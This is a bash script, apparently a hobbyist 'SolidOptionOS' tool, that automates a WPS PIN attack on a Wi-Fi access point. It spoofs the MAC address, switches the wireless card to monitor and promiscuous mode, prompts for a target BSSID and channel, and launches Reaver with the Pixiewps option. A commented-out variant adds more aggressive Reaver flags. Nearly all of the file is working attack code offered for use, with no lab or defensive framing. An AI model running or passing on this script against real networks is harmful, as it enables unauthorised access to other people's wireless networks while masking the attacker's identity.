#!/bin/bash
clear

## Colors
dgrey="\033[0;34m"
port="\033[0;33m"
RED="\033[1;31m"
GREEN="\033[2;32m"
YELLOW="\033[1;33m"
BLUE="\033[1;34m"
RED="\033[0;31m"
ENDCOLOR="\033[0m"

## Paths
PERSISTENCEPATH="/root"
SCRIPTSPATH="/root/scripts"
CAPTUREPATH="/root/captures"

## Preferred Options
SETOPTIONS=" --showack --band abg --wps -aMU --cswitch 1"

## Date
### mm/dd/yyyy ####
now="$(date +'%d.%m.%Y')"

echo -e $BLUE"#################################################################"$ENDCOLOR;
echo -e $YELLOW"   ____     ___    __  ____       __  _             ____  ____"$ENDCOLOR;
echo -e $YELLOW"  / __/__  / (_)__/ / / __ \___  / /_(_)__  ___    / __ \/ __/"$ENDCOLOR;
echo -e $YELLOW" _\ \/ _ \/ / / _  / / /_/ / _ \/ __/ / _ \/ _ \  / /_/ /\ \  "$ENDCOLOR;
echo -e $YELLOW"/___/\___/_/_/\_,_/  \____/ .__/\__/_/\___/_//_/  \____/___/  "$ENDCOLOR;
echo -e $YELLOW"                         /_/                                  "$ENDCOLOR;
echo -e $BLUE"#################################################################"$ENDCOLOR;
echo -e $YELLOW"# Created by h3x at SolidOptionOS.  All rights reserved. 2015   #"$ENDCOLOR;
echo -e $BLUE"#################################################################"$ENDCOLOR;

echo ""
sleep 0.5
echo -e $BLUE"Checking for root access.. "$ENDCOLOR
sleep 0.5
if [ $USER != root ]; then
echo -e $RED"[h3x]:Error: must be root"$ENDCOLOR
echo -e $BLUE"[h3x]:Exiting..."$ENDCOLOR
exit 0
fi
sleep 1

echo -e $BLUE"Reaver attack compatible with Pixiewps "$ENDCOLOR;
sleep 1

airmon-ng check kill
rfkill unblock all
ifconfig

echo -e $YELLOW"Select Interface: "$ENDCOLOR;
read INTERFACE
sleep 1
echo -e $BLUE"[ifconfig]Taking down $INTERFACE "$ENDCOLOR;
sudo ifconfig $INTERFACE down
sleep 1
echo -e $BLUE"[macchanger]Changing MAC Address "$ENDCOLOR;
sudo macchanger $INTERFACE -bra
sleep 1
echo -e $BLUE"[iw]Setting $INTERFACE to monitor mode "$ENDCOLOR;
sudo iw dev $INTERFACE set type monitor
#ifconfig $INTERFACE arp multicast allmulti promisc mtu 1492 0.0.0.0 0.0.0.0 && dhclient
sleep 1
echo -e $BLUE"[ifconfig]Setting $INTERFACE to promisc mode "$ENDCOLOR;
sudo ifconfig $INTERFACE promisc
sleep 1
echo -e $BLUE"ifconfig]Raising $INTERFACE back up "$ENDCOLOR;
sudo ifconfig $INTERFACE up
sleep 1
echo -e $BLUE"[iw]Info for $INTERFACE: "$ENDCOLOR;
sudo iw $INTERFACE info
sleep 1
echo -e $YELLOW"$INTERFACE successfully set to monitor mode. "$ENDCOLOR;

#echo -e $YELLOW"Enter interface: (ex,wlan0) "$ENDCOLOR;
#read INTERFACE
#sleep 1
echo -e $YELLOW"Enter BSSID: "$ENDCOLOR;
read BSSID
#sleep 1
echo -e $YELLOW"Enter Channel: "$ENDCOLOR;
read CHANNEL
sleep 1
#echo -e $YELLOW"Enter desired monitor interface: (ex. mon0)"$ENDCOLOR;
#read MONFACE
#sleep 1
#echo -e $BLUE"Adding $MONFACE to $INTERFACE.."$ENDCOLOR;
#sleep 1
#iw $INTERFACE interface add $MONFACE type monitor
#sleep 1
#echo -e $BLUE"Starting $MONFACE in airmon-ng.."$ENDCOLOR;
#sleep 1
#airmon-ng start $MONFACE
#echo -e $BLUE"Taking down new monitor interface.."$ENDCOLOR;
#sleep 1
#ifconfig $MONFACEmon down
#echo -e $BLUE"Changing mac address.."$ENDCOLOR;
#sleep 1
#macchanger -br $MONFACEmon
#echo ""
#sleep 1
#echo -e $BLUE"Putting $MONFACEmon into monitor mode.."$ENDCOLOR;
#sleep 1
#iwconfig $MONFACEmon mode monitor
#echo ""
#echo -e $BLUE"Bringing $MONFACEmon back up.."$ENDCOLOR;
#sleep 1
#ifconfig $MONFACEmon up
#echo ""
#sleep 1
echo -e $BLUE"Ready to attack $BSSID on $CHANNEL with $MONFACEmon!"$ENDCOLOR;
echo -e $YELLOW"Type 'go' when ready."$ENDCOLOR;
read READY

if [[ $READY = 'go' ]] ; then

reaver -i $INTERFACE -b $BSSID -c $CHANNEL -vvv -K 1

else
echo ""
echo -e $BLUE"Attack aborted.  Goodbye"$ENDCOLOR;
exit 0
fi

#reaver -i $MONFACEmon -b $BSSID -c $CHANNEL -d 0 --lock-delay=250 --fixed --timeout=1 --fall-wait=360 --dh-small --eap-terminate --nack -vvv -K 1
